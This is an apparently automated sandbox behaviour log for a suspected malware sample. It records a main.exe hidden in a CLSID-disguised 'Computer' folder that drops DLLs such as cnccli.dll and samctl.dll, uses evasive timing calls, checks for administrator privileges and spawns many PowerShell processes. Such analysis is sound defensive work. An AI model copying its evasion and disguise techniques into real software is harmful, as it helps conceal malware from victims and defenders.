Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: GetLastError,EnumServicesStatusExA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,strlen,strlen,GetProcessHeap,HeapAlloc,strcpy,22_2_00007FF8B91834F4
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,22_2_00007FF8B9152BA8
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,22_2_00007FF8B9185728
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,22_2_00007FF8BA502BA8
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,22_2_00007FF8BFAB1D98
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,22_2_00007FF8BFB52CE8
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,22_2_00007FF8BFB82278
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7085Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2656Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6702Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2980Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5903Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3867Jump to behavior
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeWindow / User API: threadDelayed 3609
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeWindow / User API: threadDelayed 4778
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Windows\Temp\L0FsI2PIJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Windows\Temp\rVtDGbMQJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Windows\Temp\gBXHuZY0Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\termsrv32.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rfxvmt.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Windows\Temp\erT926zeJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Windows\Temp\rmcjgYnLJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Windows\Temp\y8J74cEHJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Windows\Temp\ypqwg32tJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Windows\Temp\fYg6Jeg5Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Windows\Temp\3rVpJMV7Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_22-58679
Source: C:\Users\user\AppData\Local\Temp\hstmhco83f64lehv4q0wbzqj3o.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_11-10214
Source: C:\Users\user\Desktop\ET5.exe TID: 6468Thread sleep time: -32520000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1532Thread sleep count: 7085 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1532Thread sleep count: 2656 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 320Thread sleep time: -6456360425798339s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6352Thread sleep count: 6702 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6488Thread sleep count: 2980 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4768Thread sleep time: -6456360425798339s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1440Thread sleep count: 5903 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5768Thread sleep count: 3867 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6768Thread sleep time: -4611686018427385s >= -30000sJump to behavior
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 5160Thread sleep count: 163 > 30
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 5160Thread sleep time: -81500s >= -30000s
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 1680Thread sleep count: 181 > 30
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 1680Thread sleep time: -90500s >= -30000s
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 5464Thread sleep count: 85 > 30
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 1848Thread sleep count: 3609 > 30
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 1848Thread sleep time: -10827000s >= -30000s
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 1848Thread sleep count: 4778 > 30
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 1848Thread sleep time: -14334000s >= -30000s
Source: C:\Users\user\Desktop\ET5.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809Jump to behavior
Source: C:\Users\user\Desktop\ET5.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809Jump to behavior
Source: C:\Users\user\Desktop\ET5.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809Jump to behavior
Source: C:\Users\user\Desktop\ET5.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809Jump to behavior
Source: C:\Users\user\Desktop\ET5.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
